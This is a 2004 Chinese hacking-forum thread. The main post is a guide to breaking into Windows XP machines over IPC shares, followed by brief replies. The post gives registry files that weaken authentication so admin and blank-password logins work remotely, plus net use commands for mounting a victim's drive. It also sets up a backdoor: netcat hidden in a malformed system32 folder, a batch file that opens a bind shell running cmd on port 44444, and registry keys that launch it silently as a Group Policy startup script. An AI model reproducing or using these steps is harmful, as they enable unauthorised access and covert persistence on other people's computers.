|
![]() | 作者: uncracker [uncracker]
![]() |
登录 |
XP的IPC入侵与2000最大的不同在于来访者的权限问题,这也是许多关于询问为什么 有管理员权限的用户和密码不能建立联接或许是复制文件等相关问题. 在XP的(secpol.msc)本地安全设置/本地策略/安全选项中: 网络访问:本地帐户的共享和安全模式是个关键,我记得我好像在前面提到过这方面的内容 有两个选项:经典_本地用户以自己的身份验证 仅来宾_本地用户以来宾身份验证 如果选定的是前者,那么就和2000的IPC一样只要有了admin的权限就OK了, 对应的注册表键值: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "forceguest"=dword:00000001 1代表的是来宾身份,就是没有权限,系统默认是1,所以有时我们用admin权限的用户虽然能建立联接,但是当复制或 映射盘符的时候就会发生错误5,现在我们知道为什么了嘛!!! 改成0就行了,在XP的SHELL下通过echo命令来生成*.reg然后导入就行了,具体的怎么样获得shell 不在今天讨论的范围内,我觉得XP好像只有溢出吧。XP就是XP,不过现在溢出的工具很多的,ms04011,ms03049... 值得注意的是,在这儿有一点儿略有不同的是关于空密码的有效性问题. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa] "forceguest"=dword:00000000 "limitblankpassworduse"=dword:00000000 很明显看出来,通过导入注册表来修改安全设置。 0:代表空密码有效。 1:代表空密码无效。 导入后应该说IPC就可以net use z:\\ip\c$那样用人家的盘了,不错哦,祝你好运哦!!!!!!!!!!! 顺便说一下关于后门的设置,自我感觉不错,所以不敢独享。 关于2000,综XP的文件名漏洞相信大家早已听说过了吧,现在我们就利用来为我们的后门服务。 我们可以在对方的system32下建立了一个文件夹名为com..\,然后复制后门工具,我感觉nc很不错的, 当然杀毒软件是不会查出任何病毒的,然后通过一个批处理,每一次启动的时候就copy nc出来监听等待连接。 也可以反弹来连接,效果相当不错的 我的批处理如下:script.bat ____________________________ @ echo off echo ******************************************* echo ********This is a startup script bat******* echo ******************************************* @rem first you should create a com..\ in %systemroot%\system32 @rem Then copy nc.exe to com..\ @rem Everytime startup copy a nc.exe to system32 and listening 44444 @copy %systemroot%\system32\com..\nc.exe /y %systemroot%\system32\service.exe @service -d -L -p 44444 -e cmd ______________________________ 每次开机的时候就运行这个批处理,我们的后门就做好了,现在关键是怎么开机自动运行了,有人很快想到了注册表。 对,就是注册表,run键下吗??很容易发现了,下面的这个注册表是通过开机脚本运行的,不会有任何的反应,也不会像放在run键下会有一闪的现象。 ____________________________ Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0] "GPO-ID"="LocalGPO" "SOM-ID"="Local" "FileSysPath"="D:\\WINdows\\System32\\GroupPolicy\\Machine" "DisplayName"="Local Group Policy" "GPOName"="Local Group Policy" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0] "Script"="e:\\tools\\script.bat" "Parameters"="" "ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0] "GPO-ID"="LocalGPO" "SOM-ID"="Local" "FileSysPath"="D:\\WINdows\\System32\\GroupPolicy\\Machine" "DisplayName"="Local Group Policy" "GPOName"="Local Group Policy" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0] "Script"="e:\\tools\\script.bat" "Parameters"="" "ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ____________________________________ 对应的系统盘要修改一下,这个是我通过在gpedit.msc/计算机配制/windows设置/脚本/里面修改后对比注册表快照得出来的,用户配制好像没有成功过, 当然注册表表也是不同的 可能其中有一部分很多余的,可能还能去掉而变得更加简洁,我反复做过20多次实验的,应该没有什么问题的 但是还是希望看到帖子的读者能亲自动手试一试,最终灵活使用. 这篇文章没有什么高深的技术,都是我的平时的精心收集的,希望好像我这样的菜鸟有一定的启迪作用。到许多关于询问关于xp的利用IPC入侵的问题,我从自己实际经历中总结了一些。 |
地主 发表时间: 04-06-01 15:52 |
![]() | 回复: NetGreat [kailangq] ![]() |
登录 |
老兄,你试过没? |
B1层 发表时间: 04-06-01 17:42 |
![]() | 回复: 110 [chinawww] ![]() |
登录 |
大哥不对吧 |
B2层 发表时间: 04-06-05 01:57 |
![]() | 回复: tianya2003 [tianya2003] ![]() |
登录 |
前面的是对的,后面的偶要回去试试才知道! |
B3层 发表时间: 04-06-05 16:20 |
![]() | 回复: lijingxi [lijingxi] ![]() |
登录 |
恩! 是啊! |
B4层 发表时间: 04-06-05 18:51 |
![]() | 回复: eagle_1 [eagle_1] ![]() |
登录 |
高深~! |
B5层 发表时间: 04-07-12 15:31 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号